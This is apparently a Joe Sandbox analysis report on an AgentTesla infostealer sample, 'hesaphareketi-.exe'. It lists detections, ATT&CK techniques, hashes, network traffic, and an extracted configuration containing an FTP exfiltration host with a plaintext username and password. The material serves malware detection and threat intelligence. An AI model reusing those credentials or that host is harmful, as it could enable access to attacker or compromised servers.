Windows
Analysis Report
hesaphareketi-.exe
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Classification
- System is w10x64
- hesaphareketi-.exe (PID: 6832 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: 6EE05D4DD363D273CE38C497B1238DB1)
- hesaphareketi-.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: 6EE05D4DD363D273CE38C497B1238DB1)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
| INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
AV Detection
- Avira URL Cloud
- Malware Configuration Extractor
- ReversingLabs
- Integrated Neural Analysis Model
- Joe Sandbox ML
- Static PE information (2 entries)
- HTTPS traffic detected
- Binary string (2 entries)
Networking
- TCP traffic
- File source
- TCP traffic
- IP Address (3 entries)
- ASN Name
- JA3 fingerprint
- DNS query (3 entries)
- FTP traffic detected
- HTTP traffic detected
- UDP traffic detected without corresponding DNS query (2 entries)
- HTTP traffic detected
- DNS traffic detected (2 entries)
- String found in binary or memory (33 entries)
- Network traffic detected (2 entries)
- HTTPS traffic detected
Key, Mouse, Clipboard, Microphone and Screen Capturing
- .Net Code (2 entries)
- Code function: 2_2_067F8FC8
- Windows user hook set
- Window created
System Summary
- Matched rule (10 entries)
- Long String
- Process Stats
- Code function (26 entries): 0_2_0275DAEC, 2_2_029FE590, 2_2_029FAA98, 2_2_029F4A58, 2_2_029F3E40, 2_2_029FDD18, 2_2_029F4188, 2_2_029FAA93, 2_2_067F0274, 2_2_067FE3E8, 2_2_067F24F7, 2_2_067F1808, 2_2_067F1803, 2_2_06805590, 2_2_068065D8, 2_2_0680B218, 2_2_06802358, 2_2_0680C178, 2_2_06807D68, 2_2_06807688, 2_2_0680E390, 2_2_068083B0, 2_2_06800040, 2_2_06805CD8, 2_2_06800007, 2_2_06800537
- Binary or memory string (11 entries)
- Static PE information
- Matched rule (10 entries)
- Cryptographic APIs (8 entries)
- Security API names (12 entries)
- Classification label
- File created
- Mutant created
- Static PE information
- Static file information
- WMI Queries (2 entries)
- File read
- Key opened
- ReversingLabs
- String found in binary or memory (2 entries)
- Process created (3 entries)
- Section loaded (62 entries)
- Key value queried
- Window detected
- File opened
- Key opened
- Static PE information (3 entries)
- Binary string (2 entries)
Data Obfuscation
- .Net Code (5 entries)
- Static PE information
- High entropy of concatenated method names (63 entries)
- Registry key monitored for changes (2 entries)
- Process information set (105 entries)
Malware Analysis System Evasion |
---|
Source: | File source: |
Source: | WMI Queries: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 31 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Software Packing | NTDS | 111 Security Software Discovery | Distributed Component Object Model | 31 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | ||
100% | Joe Sandbox ML | | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 104.26.12.205 | true | false | unknown | |
ftp.normagroup.com.tr | 104.247.165.99 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | true | | unknown |
| | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false |
104.247.165.99 | ftp.normagroup.com.tr | United States | | 8100 | ASN-QUADRANET-GLOBALUS | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1446733 |
Start date and time: | 2024-05-23 20:25:12 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | hesaphareketi-.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@3/1@2/2 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: hesaphareketi-.exe
Time | Type | Description |
---|---|---|
14:26:11 | API Interceptor | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.26.12.205 | | Get hash | malicious | Stealit | Browse | |
| | Get hash | malicious | Stealit | Browse | |
| | Get hash | malicious | Stealit | Browse | |
| | Get hash | malicious | Stealit | Browse | |
| | Get hash | malicious | Bunny Loader | Browse | |
| | Get hash | malicious | Remcos | Browse | |
104.247.165.99 | | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
api.ipify.org | | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | HTMLPhisher | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla, GuLoader | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla, GuLoader | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
ftp.normagroup.com.tr | | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | | Get hash | malicious | Remcos, DBatLoader | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Lokibot | Browse | |
| | Get hash | malicious | MalLnk | Browse | |
| | Get hash | malicious | GuLoader | Browse | |
| | Get hash | malicious | Unknown | Browse | |
ASN-QUADRANET-GLOBALUS | | Get hash | malicious | AveMaria, GuLoader, PrivateLoader | Browse | |
| | Get hash | malicious | AveMaria, GuLoader, PrivateLoader | Browse | |
| | Get hash | malicious | AveMaria, GuLoader, PrivateLoader | Browse | |
| | Get hash | malicious | Remcos, GuLoader | Browse | |
| | Get hash | malicious | Remcos, GuLoader | Browse | |
| | Get hash | malicious | Remcos, GuLoader | Browse | |
| | Get hash | malicious | Remcos | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Remcos, GuLoader | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
| | Get hash | malicious | GuLoader | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | GuLoader, XWorm | Browse | |
| | Get hash | malicious | GuLoader, XWorm | Browse | |
| | Get hash | malicious | GuLoader | Browse | |
| | Get hash | malicious | AsyncRAT, GuLoader | Browse | |
Process: | C:\Users\user\Desktop\hesaphareketi-.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1216 |
Entropy (8bit): | 5.34331486778365 |
Encrypted: | false |
SSDEEP: | 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ |
MD5: | 1330C80CAAC9A0FB172F202485E9B1E8 |
SHA1: | 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492 |
SHA-256: | B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560 |
SHA-512: | 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: | |
File type: | |
Entropy (8bit): | 6.960231532527883 |
TrID: | |
File name: | hesaphareketi-.exe |
File size: | 939'008 bytes |
MD5: | 6ee05d4dd363d273ce38c497b1238db1 |
SHA1: | 7c4f86c5edfe9cf5d1955c4af44cd8d0a25a0f0a |
SHA256: | 1a88cd1b38768b690166ed6a6647ca7e975a68b7112c0e938cdfaaea8d509c9e |
SHA512: | db37e14f851f0d2de99cff71a720b72f12db0b388c60f0f89e83f2493364bf8bc72eb2a98dcae065c532a2541fc42ddb199d679b1dab91c6bc426925622e3709 |
SSDEEP: | 24576:6yK3B4Tw/bf4vQJTg4i0pMyR++/PhNt96WVp:6N94yU4i0WyD/36WV |
TLSH: | D0159F3C18FC2A229160D6A4CFE0C663F150F4FA3963992299D24755474BE9BBDC327E |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Nf..............0..J...........h... ........@.. ....................................@................................ |
Icon Hash: | 90cececece8e8eb0 |
Entrypoint: | 0x4e6816 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x664ED1A0 [Thu May 23 05:18:24 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Instruction |
---|
jmp dword ptr [00402000h] |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe67c3 | 0x4f | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe8000 | 0x5d4 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xea000 | 0xc | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe4368 | 0x54 | .text |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0xe481c | 0xe4a00 | dd0a3e2c743e52eff1e39019c616add2 | False | 0.6967765428512849 | data | 6.966251395726089 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0xe8000 | 0x5d4 | 0x600 | a73137abe1e0968be14d0125539e9fe5 | False | 0.4283854166666667 | data | 4.148648565251091 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xea000 | 0xc | 0x200 | 6d04a551d662569ede38cad17e04f668 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_VERSION | 0xe8090 | 0x344 | data | 0.4270334928229665 | ||
RT_MANIFEST | 0xe83e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | 0.5489795918367347 |
DLL | Import |
---|---|
mscoree.dll | _CorExeMain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 20:26:13.593163967 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:13.593242884 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:13.593353033 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:13.601720095 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:13.601744890 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.195894003 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.196299076 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.200438023 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.200455904 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.200736046 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.242508888 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.258514881 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.302501917 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.441783905 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.441869974 CEST | 443 | 49732 | 104.26.12.205 | 192.168.2.4 |
May 23, 2024 20:26:14.442070007 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:14.450100899 CEST | 49732 | 443 | 192.168.2.4 | 104.26.12.205 |
May 23, 2024 20:26:15.761395931 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:26:15.766340971 CEST | 21 | 49734 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:26:15.766458035 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:26:15.784187078 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:26:15.835544109 CEST | 21 | 49734 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:26:15.837089062 CEST | 49734 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.133560896 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.138602018 CEST | 21 | 49744 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:27:47.138734102 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.138840914 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:27:47.182372093 CEST | 21 | 49744 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:27:47.182492018 CEST | 49744 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.189251900 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.194561958 CEST | 21 | 49745 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:01.197756052 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:01.197854996 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
